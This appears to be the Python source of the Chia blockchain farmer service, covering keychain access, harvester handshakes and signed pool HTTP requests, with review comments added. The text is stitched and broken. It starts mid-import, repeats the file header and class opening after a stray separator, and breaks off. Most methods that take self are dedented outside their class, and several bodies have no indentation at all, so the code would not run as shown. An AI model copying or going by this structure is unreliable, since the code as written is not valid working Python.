get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.server.ws_connection import WSChiaConnection
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.bech32m import decode_puzzle_hash
from chia.util.byte_types import hexstr_to_bytes
from chia.util.config import load_config, lock_and_load_config, save_config, config_path_for_filename
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint16, uint32, uint64
from chia.util.keychain import Keychain
from chia.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
# Tree hash of the singleton puzzle, computed once at import time.
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()

log = logging.getLogger(__name__)

# Seconds between refreshes of cached pool info (GET /pool_info) and of the
# per-pool farmer record (GET /farmer).
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300

"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class Farmer:
    """Farmer node: tracks signage points and proofs from harvesters and keeps
    per-pool state in sync with the configured pools."""

    def __init__(
        self,
        root_path: Path,
        farmer_config: Dict,
        pool_config: Dict,
        consensus_constants: ConsensusConstants,
        local_keychain: Optional[Keychain] = None,
    ):
        # Created lazily by ensure_keychain_proxy().
        self.keychain_proxy: Optional[KeychainProxy] = None
        self.local_keychain = local_keychain
        self._root_path = root_path
        self.config = farmer_config
        self.pool_config = pool_config
        # Keep track of all sps, keyed on challenge chain signage point hash
        self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
        # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
        self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
        # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
        self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
        # number of responses to each signage point
        self.number_of_responses: Dict[bytes32, int] = {}
        # A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
        # to periodically clear the memory
        self.cache_add_time: Dict[bytes32, uint64] = {}
        # One plot-sync Receiver per connected harvester, keyed by peer node id.
        self.plot_sync_receivers: Dict[bytes32, Receiver] = {}
        self.cache_clear_task: Optional[asyncio.Task] = None
        self.update_pool_state_task: Optional[asyncio.Task] = None
        self.constants = consensus_constants
        self._shut_down = False
        self.server: Any = None
        self.state_changed_callback: Optional[Callable] = None
        self.log = log
        # Set True once setup_keys() has succeeded (see _start).
        self.started = False
        self.harvester_handshake_task: Optional[asyncio.Task] = None
        # From p2_singleton_puzzle_hash to pool state dict
        self.pool_state: Dict[bytes32, Dict] = {}
        # From p2_singleton to auth PrivateKey
        self.authentication_keys: Dict[bytes32, PrivateKey] = {}
        # Last time we updated pool_state based on the config file
        self.last_config_access_time: uint64 = uint64(0)
async def ensure_keychain_proxy(self) -> KeychainProxy:
    """Return the keychain proxy, creating it on first use.

    Wraps the local keychain when one was injected; otherwise connects to the
    keychain daemon and raises KeychainProxyConnectionFailure if that fails.
    """
    # NOTE(review): indentation reconstructed — the connection-failure check is
    # assumed to apply to the daemon-connect branch only; confirm against upstream.
    if self.keychain_proxy is None:
        if self.local_keychain:
            self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
        else:
            self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
            if not self.keychain_proxy:
                raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
    return self.keychain_proxy
async def get_all_private_keys(self):
    """Fetch all root private keys from the keychain service."""
    proxy = await self.ensure_keychain_proxy()
    return await proxy.get_all_private_keys()
async def setup_keys(self) -> bool:
    """Load keys and reward targets from the keychain and config.

    Returns False (after logging) when no keys exist yet or the config has no
    xch_target_address — callers retry until this succeeds.
    """
    no_keys_error_str = "No keys exist. Please run 'chia keys generate' or open the UI."
    self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
    # Child keys used for farming: farmer keys plus (legacy self-pooling) pool keys.
    self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
        master_sk_to_pool_sk(sk) for sk in self.all_root_sks
    ]
    if len(self.get_public_keys()) == 0:
        log.warning(no_keys_error_str)
        return False

    # Fall back to the on-disk config when the injected sections lack the address.
    config = load_config(self._root_path, "config.yaml")
    if "xch_target_address" not in self.config:
        self.config = config["farmer"]
    if "xch_target_address" not in self.pool_config:
        self.pool_config = config["pool"]
    if "xch_target_address" not in self.config or "xch_target_address" not in self.pool_config:
        log.debug("xch_target_address missing in the config")
        return False

    # This is the farmer configuration
    self.farmer_target_encoded = self.config["xch_target_address"]
    self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)

    self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]

    # This is the self pooling configuration, which is only used for original self-pooled plots
    self.pool_target_encoded = self.pool_config["xch_target_address"]
    self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
    self.pool_sks_map: Dict = {}
    for key in self.get_private_keys():
        self.pool_sks_map[bytes(key.get_g1())] = key

    assert len(self.farmer_target) == 32
    assert len(self.pool_target) == 32
    if len(self.pool_sks_map) == 0:
        log.warning(no_keys_error_str)
        return False
    return True
async def _start(self):
    """Kick off background startup: retry key setup, then launch periodic tasks."""

    async def start_task():
        # `Farmer.setup_keys` returns `False` if there are no keys setup yet. In this case we just try until it
        # succeeds or until we need to shut down.
        while not self._shut_down:
            if await self.setup_keys():
                self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
                self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
                log.debug("start_task: initialized")
                self.started = True
                return
            await asyncio.sleep(1)

    # NOTE(review): the task reference is not stored, so it could in principle be
    # garbage-collected before completing — confirm whether a reference should be kept.
    asyncio.create_task(start_task())
def _close(self):
    """Signal all background loops to exit; _await_closed() waits for them."""
    self._shut_down = True
async def _await_closed(self, shutting_down: bool = True):
    """Wait for background tasks to finish and optionally close the keychain proxy.

    Args:
        shutting_down: when True, also tear down the keychain proxy connection.
    """
    if self.cache_clear_task is not None:
        await self.cache_clear_task
    if self.update_pool_state_task is not None:
        await self.update_pool_state_task
    if shutting_down and self.keychain_proxy is not None:
        proxy = self.keychain_proxy
        self.keychain_proxy = None
        await proxy.close()
        await asyncio.sleep(0.5)  # https://docs.aiohttp.org/en/stable/client_advanced.html#graceful-shutdown
    self.started = False
def _set_state_changed_callback(self, callback: Callable):
    """Register the callback invoked by state_changed() (e.g. for the RPC/UI layer)."""
    self.state_changed_callback = callback
async def on_connect(self, peer: WSChiaConnection):
    """Handle a new peer connection; for harvesters, register plot sync and handshake."""
    self.state_changed("add_connection", {})

    async def handshake_task():
        # Wait until the task in `Farmer._start` is done so that we have keys available for the handshake. Bail out
        # early if we need to shut down or if the harvester is not longer connected.
        while not self.started and not self._shut_down and peer in self.server.get_connections():
            await asyncio.sleep(1)

        if self._shut_down:
            log.debug("handshake_task: shutdown")
            self.harvester_handshake_task = None
            return

        if peer not in self.server.get_connections():
            log.debug("handshake_task: disconnected")
            self.harvester_handshake_task = None
            return

        # Sends a handshake to the harvester
        handshake = harvester_protocol.HarvesterHandshake(
            self.get_public_keys(),
            self.pool_public_keys,
        )
        msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
        await peer.send_message(msg)
        self.harvester_handshake_task = None

    # NOTE(review): nesting reconstructed — both the receiver registration and the
    # handshake launch are assumed to apply only to harvester peers; confirm upstream.
    if peer.connection_type is NodeType.HARVESTER:
        self.plot_sync_receivers[peer.peer_node_id] = Receiver(peer, self.plot_sync_callback)
        self.harvester_handshake_task = asyncio.create_task(handshake_task())
def set_server(self, server):
    """Attach the ChiaServer instance used for peer lookups and messaging."""
    self.server = server
def state_changed(self, change: str, data: Dict[str, Any]):
if self.state_changed_callback is not None:
self.state_changed_callback(change, data)
def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
    """Log a pool request failure and record it in that pool's rolling error list."""
    self.log.error(error_message)
    self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
        ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
    )
def on_disconnect(self, connection: ws.WSChiaConnection):
    """Handle a peer disconnect; drop the plot-sync receiver for harvesters."""
    self.log.info(f"peer disconnected {connection.get_peer_logging()}")
    self.state_changed("close_connection", {})
    if connection.connection_type is NodeType.HARVESTER:
        del self.plot_sync_receivers[connection.peer_node_id]
async def plot_sync_callback(self, peer_id: bytes32, delta: Delta) -> None:
    """Receiver callback: notify listeners when a harvester's plot set changed."""
    log.info(f"plot_sync_callback: peer_id {peer_id}, delta {delta}")
    if not delta.empty():
        self.state_changed("new_plots", await self.get_harvesters())
async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
    """GET /pool_info from the pool; returns the parsed JSON or None on failure.

    Failures are logged via handle_failed_pool_response rather than raised.
    """
    try:
        # trust_env=True honours HTTP(S)_PROXY environment variables.
        async with aiohttp.ClientSession(trust_env=True) as session:
            async with session.get(
                f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
            ) as resp:
                if resp.ok:
                    response: Dict = json.loads(await resp.text())
                    self.log.info(f"GET /pool_info response: {response}")
                    return response
                else:
                    self.handle_failed_pool_response(
                        pool_config.p2_singleton_puzzle_hash,
                        f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
                    )
    except Exception as e:
        self.handle_failed_pool_response(
            pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
        )
    return None
async def _pool_get_farmer(
    self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
) -> Optional[Dict]:
    """GET /farmer from the pool, authenticated with a signed token.

    Returns the parsed JSON response (which may contain "error_code") or None
    when the request failed outright. Error responses are appended to the
    pool's rolling error list.
    """
    authentication_token = get_current_authentication_token(authentication_token_timeout)
    message: bytes32 = std_hash(
        AuthenticationPayload(
            "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
        )
    )
    signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
    get_farmer_params = {
        "launcher_id": pool_config.launcher_id.hex(),
        "authentication_token": authentication_token,
        "signature": bytes(signature).hex(),
    }
    try:
        async with aiohttp.ClientSession(trust_env=True) as session:
            async with session.get(
                f"{pool_config.pool_url}/farmer",
                params=get_farmer_params,
                ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
            ) as resp:
                if resp.ok:
                    response: Dict = json.loads(await resp.text())
                    log_level = logging.INFO
                    if "error_code" in response:
                        log_level = logging.WARNING
                        self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                    self.log.log(log_level, f"GET /farmer response: {response}")
                    return response
                else:
                    self.handle_failed_pool_response(
                        pool_config.p2_singleton_puzzle_hash,
                        f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
                    )
    except Exception as e:
        self.handle_failed_pool_response(
            pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
        )
    return None
async def _pool_post_farmer(
    self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
    """Register this farmer with the pool via POST /farmer.

    The payload is signed with the owner key; returns the parsed JSON response
    or None when the request failed outright.
    """
    auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
    assert auth_sk is not None
    post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
        pool_config.launcher_id,
        get_current_authentication_token(authentication_token_timeout),
        auth_sk.get_g1(),
        pool_config.payout_instructions,
        None,
    )
    assert owner_sk.get_g1() == pool_config.owner_public_key
    signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
    post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)

    self.log.debug(f"POST /farmer request {post_farmer_request}")
    try:
        # trust_env=True so proxy environment variables are honoured,
        # consistent with the GET requests in this class.
        async with aiohttp.ClientSession(trust_env=True) as session:
            async with session.post(
                f"{pool_config.pool_url}/farmer",
                json=post_farmer_request.to_json_dict(),
                ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
            ) as resp:
                if resp.ok:
                    response: Dict = json.loads(await resp.text())
                    log_level = logging.INFO
                    if "error_code" in response:
                        log_level = logging.WARNING
                        self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                    self.log.log(log_level, f"POST /farmer response: {response}")
                    return response
                else:
                    self.handle_failed_pool_response(
                        pool_config.p2_singleton_puzzle_hash,
                        f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
                    )
    except Exception as e:
        self.handle_failed_pool_response(
            pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
        )
    return None
async def _pool_put_farmer(
    self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> None:
    """Update this farmer's record on the pool via PUT /farmer.

    The payload is signed with the owner key; failures are logged via
    handle_failed_pool_response rather than raised.
    """
    auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
    assert auth_sk is not None
    put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
        pool_config.launcher_id,
        get_current_authentication_token(authentication_token_timeout),
        auth_sk.get_g1(),
        pool_config.payout_instructions,
        None,
    )
    assert owner_sk.get_g1() == pool_config.owner_public_key
    signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
    put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)

    self.log.debug(f"PUT /farmer request {put_farmer_request}")
    try:
        # trust_env=True so proxy environment variables are honoured,
        # consistent with the GET requests in this class.
        async with aiohttp.ClientSession(trust_env=True) as session:
            async with session.put(
                f"{pool_config.pool_url}/farmer",
                json=put_farmer_request.to_json_dict(),
                ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
            ) as resp:
                if resp.ok:
                    response: Dict = json.loads(await resp.text())
                    log_level = logging.INFO
                    if "error_code" in response:
                        log_level = logging.WARNING
                        self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                    self.log.log(log_level, f"PUT /farmer response: {response}")
                else:
                    self.handle_failed_pool_response(
                        pool_config.p2_singleton_puzzle_hash,
                        f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
                    )
    except Exception as e:
        self.handle_failed_pool_response(
            pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
        )
def get_authentication_sk(self, pool_config: PoolWalletConfig) -> Optional[PrivateKey]:
if pool_config.p2_singleton_puzzle_hash in self.authentication_keys:
return self.authentication_keys[pool_config.p2_singleton_puzzle_hash]
auth_sk: Optional[PrivateKey] = find_authentication_sk(self.all_root_sks, pool_config.owner_public_key)
if auth_sk is not None:
self.authentication_keys[pool_config.p2_singleton_puzzle_hash] = auth_sk
return auth_sk
async def update_pool_state(self):
    """Sync per-pool state with the pool config file and the pools themselves.

    For each configured pool: ensure an authentication key exists, initialize
    the in-memory state dict, periodically refresh GET /pool_info and
    GET /farmer, register with POST /farmer when unknown, and PUT /farmer when
    payout instructions changed or the signature was rejected. Exceptions per
    pool are logged and do not abort the loop.
    """
    config = load_config(self._root_path, "config.yaml")
    pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
    for pool_config in pool_config_list:
        p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
        try:
            authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
            if authentication_sk is None:
                self.log.error(f"Could not find authentication sk for {p2_singleton_puzzle_hash}")
                continue

            add_auth_key(self._root_path, pool_config, authentication_sk.get_g1())

            if p2_singleton_puzzle_hash not in self.pool_state:
                self.pool_state[p2_singleton_puzzle_hash] = {
                    "points_found_since_start": 0,
                    "points_found_24h": [],
                    "points_acknowledged_since_start": 0,
                    "points_acknowledged_24h": [],
                    "next_farmer_update": 0,
                    "next_pool_info_update": 0,
                    "current_points": 0,
                    "current_difficulty": None,
                    "pool_errors_24h": [],
                    "authentication_token_timeout": None,
                }
                self.log.info(f"Added pool: {pool_config}")
            pool_state = self.pool_state[p2_singleton_puzzle_hash]
            pool_state["pool_config"] = pool_config

            # Skip state update when self pooling
            if pool_config.pool_url == "":
                continue

            enforce_https = config["full_node"]["selected_network"] == "mainnet"
            if enforce_https and not pool_config.pool_url.startswith("https://"):
                self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
                continue

            # TODO: Improve error handling below, inform about unexpected failures
            if time.time() >= pool_state["next_pool_info_update"]:
                pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
                # Makes a GET request to the pool to get the updated information
                pool_info = await self._pool_get_pool_info(pool_config)
                if pool_info is not None and "error_code" not in pool_info:
                    pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
                    # Only update the first time from GET /pool_info, gets updated from GET /farmer later
                    if pool_state["current_difficulty"] is None:
                        pool_state["current_difficulty"] = pool_info["minimum_difficulty"]

            if time.time() >= pool_state["next_farmer_update"]:
                pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
                authentication_token_timeout = pool_state["authentication_token_timeout"]

                async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[PoolErrorCode]]:
                    # Run a GET /farmer to see if the farmer is already known by the pool
                    response = await self._pool_get_farmer(
                        pool_config, authentication_token_timeout, authentication_sk
                    )
                    farmer_response: Optional[GetFarmerResponse] = None
                    error_code_response: Optional[PoolErrorCode] = None
                    if response is not None:
                        if "error_code" not in response:
                            farmer_response = GetFarmerResponse.from_json_dict(response)
                            if farmer_response is not None:
                                pool_state["current_difficulty"] = farmer_response.current_difficulty
                                pool_state["current_points"] = farmer_response.current_points
                        else:
                            try:
                                error_code_response = PoolErrorCode(response["error_code"])
                            except ValueError:
                                # Fix: use single quotes inside the f-string — reusing
                                # the outer quote is a SyntaxError before Python 3.12.
                                self.log.error(
                                    f"Invalid error code received from the pool: {response['error_code']}"
                                )
                    return farmer_response, error_code_response

                if authentication_token_timeout is not None:
                    farmer_info, error_code = await update_pool_farmer_info()
                    if error_code == PoolErrorCode.FARMER_NOT_KNOWN:
                        # Make the farmer known on the pool with a POST /farmer
                        # Fix: Optional takes a single type — the result is an
                        # optional (sk, index) pair.
                        owner_sk_and_index: Optional[Tuple[PrivateKey, uint32]] = find_owner_sk(
                            self.all_root_sks, pool_config.owner_public_key
                        )
                        assert owner_sk_and_index is not None
                        post_response = await self._pool_post_farmer(
                            pool_config, authentication_token_timeout, owner_sk_and_index[0]
                        )
                        if post_response is not None and "error_code" not in post_response:
                            self.log.info(
                                f"Welcome message from {pool_config.pool_url}: "
                                f"{post_response['welcome_message']}"
                            )
                            # Now we should be able to update the local farmer info
                            farmer_info, post_error_code = await update_pool_farmer_info()
                            if farmer_info is None and not post_error_code:
                                self.log.error("Failed to update farmer info after POST /farmer.")

                    # Update the farmer information on the pool if the payout instructions changed or if the
                    # signature is invalid (latter to make sure the pool has the correct authentication public key).
                    payout_instructions_update_required: bool = (
                        farmer_info is not None
                        and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
                    )
                    if payout_instructions_update_required or error_code == PoolErrorCode.INVALID_SIGNATURE:
                        owner_sk_and_index = find_owner_sk(self.all_root_sks, pool_config.owner_public_key)
                        assert owner_sk_and_index is not None
                        await self._pool_put_farmer(
                            pool_config, authentication_token_timeout, owner_sk_and_index[0]
                        )
                else:
                    self.log.warning(
                        f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
                        f", check communication with the pool."
                    )

        except Exception as e:
            tb = traceback.format_exc()
            self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
def get_public_keys(self):
return [child_sk.get_g1() for child_sk in self._private_keys]
def get_private_keys(self):
    """Return the farming child secret keys loaded by setup_keys()."""
    return self._private_keys
async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
    """Return the configured farmer/pool reward addresses.

    When search_for_private_key is True, also scan the first 500 wallet
    derivation indices of every root key to report whether we hold the keys
    for those addresses.
    """
    if search_for_private_key:
        all_sks = await self.get_all_private_keys()
        stop_searching_for_farmer, stop_searching_for_pool = False, False
        for i in range(500):
            # i > 0 forces at least one full pass before early exit
            if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
                break
            for sk, _ in all_sks:
                ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())

                if ph == self.farmer_target:
                    stop_searching_for_farmer = True
                if ph == self.pool_target:
                    stop_searching_for_pool = True

        return {
            "farmer_target": self.farmer_target_encoded,
            "pool_target": self.pool_target_encoded,
            "have_farmer_sk": stop_searching_for_farmer,
            "have_pool_sk": stop_searching_for_pool,
        }
    return {
        "farmer_target": self.farmer_target_encoded,
        "pool_target": self.pool_target_encoded,
    }
def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
    """Update the farmer and/or pool reward address, in memory and in config.yaml.

    A None argument leaves that target unchanged.
    """
    with lock_and_load_config(self._root_path, "config.yaml") as config:
        if farmer_target_encoded is not None:
            self.farmer_target_encoded = farmer_target_encoded
            self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
            config["farmer"]["xch_target_address"] = farmer_target_encoded
        if pool_target_encoded is not None:
            self.pool_target_encoded = pool_target_encoded
            self.pool_target = decode_puzzle_hash(pool_target_encoded)
            config["pool"]["xch_target_address"] = pool_target_encoded
        save_config(self._root_path, "config.yaml", config)
async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
    """Persist new payout instructions for the pool identified by launcher_id.

    Updates the matching entry in the config's pool_list and forces the next
    GET /farmer (which triggers a PUT /farmer when the pool's copy differs).
    Logs a warning when no tracked pool matches.
    """
    for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
        if launcher_id == pool_state_dict["pool_config"].launcher_id:
            with lock_and_load_config(self._root_path, "config.yaml") as config:
                new_list = []
                pool_list = config["pool"].get("pool_list", [])
                if pool_list is not None:
                    for list_element in pool_list:
                        if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
                            list_element["payout_instructions"] = payout_instructions
                        new_list.append(list_element)

                config["pool"]["pool_list"] = new_list
                save_config(self._root_path, "config.yaml", config)
            # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
            pool_state_dict["next_farmer_update"] = 0
            return

    self.log.warning(f"Launcher id: {launcher_id} not found")
async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
    """Build a signed pool login URL for the given launcher id.

    Returns None when the launcher id is not tracked or no authentication key
    can be found for it.
    """
    for pool_state in self.pool_state.values():
        pool_config: PoolWalletConfig = pool_state["pool_config"]
        if pool_config.launcher_id == launcher_id:
            authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
            if authentication_sk is None:
                self.log.error(f"Could not find authentication sk for {pool_config.p2_singleton_puzzle_hash}")
                continue
            authentication_token_timeout = pool_state["authentication_token_timeout"]
            authentication_token = get_current_authentication_token(authentication_token_timeout)
            message: bytes32 = std_hash(
                AuthenticationPayload(
                    "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
                )
            )
            signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
            return (
                pool_config.pool_url
                + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
                f"&signature={bytes(signature).hex()}"
            )

    return None
async def get_harvesters(self) -> Dict:
    """Return a dict describing every connected harvester's plot-sync state."""
    harvesters: List = []
    for connection in self.server.get_connections(NodeType.HARVESTER):
        self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
        receiver = self.plot_sync_receivers.get(connection.peer_node_id)
        if receiver is not None:
            harvesters.append(receiver.to_dict())
        else:
            # connected but no Receiver registered yet (or already removed)
            self.log.debug(
                f"get_harvesters invalid peer: {connection.peer_host}, node_id: {connection.peer_node_id}"
            )

    return {"harvesters": harvesters}
async def _periodically_update_pool_state_task(self):
    """Background loop: refresh pool state when config.yaml changes, or at least every ~60s."""
    time_slept: uint64 = uint64(0)
    config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
    while not self._shut_down:
        # Every time the config file changes, read it to check the pool state
        stat_info = config_path.stat()
        if stat_info.st_mtime > self.last_config_access_time:
            # If we detect the config file changed, refresh private keys first just in case
            self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
            # NOTE(review): st_mtime is a float assigned into a uint64-annotated
            # attribute — confirm intended.
            self.last_config_access_time = stat_info.st_mtime
            await self.update_pool_state()
            time_slept = uint64(0)
        elif time_slept > 60:
            await self.update_pool_state()
            time_slept = uint64(0)
        time_slept += 1
        await asyncio.sleep(1)
    async def _periodically_clear_cache_and_refresh_task(self):
        """Background loop: evict stale signage-point caches and periodically
        poke the GUI so connection rates stay current."""
        time_slept: uint64 = uint64(0)
        refresh_slept = 0
        while not self._shut_down:
            try:
                if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
                    now = time.time()
                    removed_keys: List[bytes32] = []
                    # Drop cache entries older than 3 sub-slot targets from all
                    # four per-signage-point dictionaries.
                    for key, add_time in self.cache_add_time.items():
                        if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
                            self.sps.pop(key, None)
                            self.proofs_of_space.pop(key, None)
                            self.quality_str_to_identifiers.pop(key, None)
                            self.number_of_responses.pop(key, None)
                            removed_keys.append(key)
                    # Removed in a second pass to avoid mutating the dict while iterating.
                    for key in removed_keys:
                        self.cache_add_time.pop(key, None)
                    time_slept = uint64(0)
                    log.debug(
                        f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
                        f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
                    )
                time_slept += 1
                refresh_slept += 1
                # Periodically refresh GUI to show the correct download/upload rate.
                if refresh_slept >= 30:
                    self.state_changed("add_connection", {})
                    refresh_slept = 0
            except Exception:
                log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
            await asyncio.sleep(1)
| import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import chia.server.ws_connection as ws # lgtm [py/import-and-import-from]
from chia.consensus.coinbase import create_puzzlehash_for_pk
from chia.consensus.constants import ConsensusConstants
from chia.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from chia.plot_sync.receiver import Receiver
from chia.plot_sync.delta import Delta
from chia.pools.pool_config import PoolWalletConfig, load_pool_config, add_auth_key
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.pool_protocol import (
ErrorResponse,
get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.server.outbound_message import NodeType, make_msg
from chia.server.server import ssl_context_for_root
from chia.server.ws_connection import WSChiaConnection
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.util.bech32m import decode_puzzle_hash
from chia.util.byte_types import hexstr_to_bytes
from chia.util.config import load_config, lock_and_load_config, save_config, config_path_for_filename
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint16, uint32, uint64
from chia.util.keychain import Keychain
from chia.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
# Tree hash of the singleton top-layer puzzle, computed once at import time.
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()

log = logging.getLogger(__name__)

# How often (seconds) to re-query GET /pool_info and GET /farmer respectively.
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300

"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class Farmer:
    """Farmer service: tracks signage points and proofs of space coming from
    connected harvesters and keeps membership state for configured pools in
    sync via the pool HTTP protocol."""

    def __init__(
        self,
        root_path: Path,
        farmer_config: Dict,
        pool_config: Dict,
        consensus_constants: ConsensusConstants,
        local_keychain: Optional[Keychain] = None,
    ):
        self.keychain_proxy: Optional[KeychainProxy] = None
        self.local_keychain = local_keychain
        self._root_path = root_path
        self.config = farmer_config
        self.pool_config = pool_config
        # Keep track of all sps, keyed on challenge chain signage point hash
        self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
        # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
        self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
        # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
